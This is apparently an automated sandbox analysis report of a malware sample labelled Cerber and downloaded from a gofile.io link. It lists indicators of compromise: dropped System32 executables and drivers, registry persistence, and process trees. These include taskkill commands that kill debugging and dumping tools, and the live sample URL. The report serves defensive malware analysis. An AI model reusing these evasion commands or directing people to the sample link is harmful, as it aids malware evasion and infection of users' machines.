cerber | hxxps://gofile[.]io/d/FRLw2p

Analysis

max time kernel
252s
max time network
271s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
14-12-2024 22:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/FRLw2p

Score

10^/10

cerber discovery persistence ransomware

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
		636	taskkill.exe
		4608	taskkill.exe
		3676	taskkill.exe
		3820	taskkill.exe
		2896	taskkill.exe
		2624	taskkill.exe
		3588	taskkill.exe
		3856	taskkill.exe
		760	taskkill.exe
		3820	taskkill.exe
		900	taskkill.exe
		3440	taskkill.exe
		2672	taskkill.exe
		3676	taskkill.exe
		4792	taskkill.exe
		4988	taskkill.exe
		228	taskkill.exe
		3060	taskkill.exe
		4368	taskkill.exe
		5064	taskkill.exe
		4428	taskkill.exe
		2492	taskkill.exe
		716	taskkill.exe
		4184	taskkill.exe
		928	taskkill.exe
		4632	taskkill.exe
		2020	taskkill.exe
		2984	taskkill.exe
		392	taskkill.exe
		3792	taskkill.exe
		5040	taskkill.exe
		3552	taskkill.exe
		1492	taskkill.exe
		1572	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2660	taskkill.exe
		1572	taskkill.exe
		2532	taskkill.exe
		4480	taskkill.exe
		1888	taskkill.exe
		1864	taskkill.exe
		784	taskkill.exe
		1308	taskkill.exe
		4036	taskkill.exe
		2068	taskkill.exe
		3552	taskkill.exe
		2324	taskkill.exe
		3896	taskkill.exe
		4644	taskkill.exe
		1712	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1960	taskkill.exe
		64	taskkill.exe
		2492	taskkill.exe
		876	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4772	taskkill.exe
		4332	taskkill.exe
		3000	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		824	taskkill.exe
		3556	taskkill.exe
		4116	taskkill.exe

Cerber family
cerber
Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\jawzNSlTDot\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\jawzNSlTDot"	mapper.exe

Executes dropped EXE 28 IoCs

pid	Process
2036	Free Clipware.exe
4648	AMIDEWINx64.EXE
3552	AMIDEWINx64.EXE
5040	AMIDEWINx64.EXE
4980	AMIDEWINx64.EXE
3376	AMIDEWINx64.EXE
4908	AMIDEWINx64.EXE
4184	AMIDEWINx64.EXE
3676	AMIDEWINx64.EXE
3340	AMIDEWINx64.EXE
3896	AMIDEWINx64.EXE
4208	AMIDEWINx64.EXE
5108	AMIDEWINx64.EXE
228	AMIDEWINx64.EXE
2372	AMIDEWINx64.EXE
4472	AMIDEWINx64.EXE
3564	AMIDEWINx64.EXE
3588	AMIDEWINx64.EXE
472	AMIDEWINx64.EXE
3932	AMIDEWINx64.EXE
1748	AMIDEWINx64.EXE
3972	AMIDEWINx64.EXE
5108	AMIDEWINx64.EXE
1336	AFUWINx64.EXE
732	AFUWINx64.EXE
1320	Steam.exe
1120	Steam.exe
1600	mapper.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
111	raw.githubusercontent.com
112	raw.githubusercontent.com

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\System32\AMIDEWINx64.EXE	Free Clipware.exe
File created	C:\Windows\System32\AFUWINx64.EXE	Free Clipware.exe
File created	C:\Windows\System32\symbols\46bd5bd5b4ac076025e641070546ecc0.pdb	mapper.exe
File opened for modification	C:\Windows\System32\symbols\46bd5bd5b4ac076025e641070546ecc0.pdb	mapper.exe
File created	C:\Windows\System32\amifldrv64.sys	Free Clipware.exe
File created	C:\Windows\System32\amigendrv64.sys	Free Clipware.exe
File created	C:\Windows\System32\Tasks\Mac.bat	curl.exe
File created	C:\Windows\System32\driver.sys	Steam.exe
File created	C:\Windows\System32\mapper.exe	Steam.exe
File created	C:\Windows\System32\symbols\46bd5bd5b4ac076025e641070546ecc0.pdb.md5	mapper.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\c90afa24-dd9d-4651-b218-575df6ed06c5.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241214221709.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1976	taskkill.exe
3316	taskkill.exe
4296	taskkill.exe
224	taskkill.exe
1144	taskkill.exe
4352	taskkill.exe
4908	taskkill.exe
1712	taskkill.exe
3676	taskkill.exe
3896	taskkill.exe
2672	taskkill.exe
1536	taskkill.exe
3792	taskkill.exe
460	taskkill.exe
4428	taskkill.exe
1244	taskkill.exe
2904	taskkill.exe
4228	taskkill.exe
1048	taskkill.exe
1888	taskkill.exe
4728	taskkill.exe
4444	taskkill.exe
2532	taskkill.exe
5040	taskkill.exe
3612	taskkill.exe
900	taskkill.exe
1868	taskkill.exe
4592	taskkill.exe
2288	taskkill.exe
4540	taskkill.exe
1308	taskkill.exe
3564	taskkill.exe
4208	taskkill.exe
4648	taskkill.exe
3820	taskkill.exe
4628	taskkill.exe
1048	taskkill.exe
3332	taskkill.exe
3560	taskkill.exe
4332	taskkill.exe
5040	taskkill.exe
3000	taskkill.exe
3376	taskkill.exe
3932	taskkill.exe
2372	taskkill.exe
2476	taskkill.exe
2208	taskkill.exe
1080	taskkill.exe
3800	taskkill.exe
2280	taskkill.exe
2788	taskkill.exe
636	taskkill.exe
3676	taskkill.exe
4352	taskkill.exe
640	taskkill.exe
224	taskkill.exe
3440	taskkill.exe
3820	taskkill.exe
2588	taskkill.exe
3792	taskkill.exe
644	taskkill.exe
1180	taskkill.exe
900	taskkill.exe
2476	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 597303.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2004	msedge.exe
2004	msedge.exe
1304	msedge.exe
1304	msedge.exe
3652	identity_helper.exe
3652	identity_helper.exe
1264	msedge.exe
1264	msedge.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2036	Free Clipware.exe
2036	Free Clipware.exe
4420	msedge.exe
4420	msedge.exe
1600	mapper.exe
1600	mapper.exe
1120	Steam.exe
1120	Steam.exe

Suspicious behavior: LoadsDriver 25 IoCs

pid	Process
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
1600	mapper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	4908	taskkill.exe
Token: SeDebugPrivilege	2548	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	460	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	224	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	3792	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	460	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	3612	taskkill.exe
Token: SeDebugPrivilege	4996	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	2532	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe
1304	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2036	Free Clipware.exe
1320	Steam.exe
1120	Steam.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 3424	1304	msedge.exe	81
PID 1304 wrote to memory of 3424	1304	msedge.exe	81
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 4356	1304	msedge.exe	82
PID 1304 wrote to memory of 2004	1304	msedge.exe	83
PID 1304 wrote to memory of 2004	1304	msedge.exe	83
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84
PID 1304 wrote to memory of 2484	1304	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/FRLw2p
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc945a46f8,0x7ffc945a4708,0x7ffc945a4718
  2⤵
  PID:3424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
  2⤵
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
  2⤵
  PID:2700
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:216
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7aee15460,0x7ff7aee15470,0x7ff7aee15480
    3⤵
    PID:100
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:1188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6504 /prefetch:8
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6652 /prefetch:8
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6532 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1264
- C:\Users\Admin\Downloads\Free Clipware.exe
  "C:\Users\Admin\Downloads\Free Clipware.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:4196
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      Cerber
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:2692
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
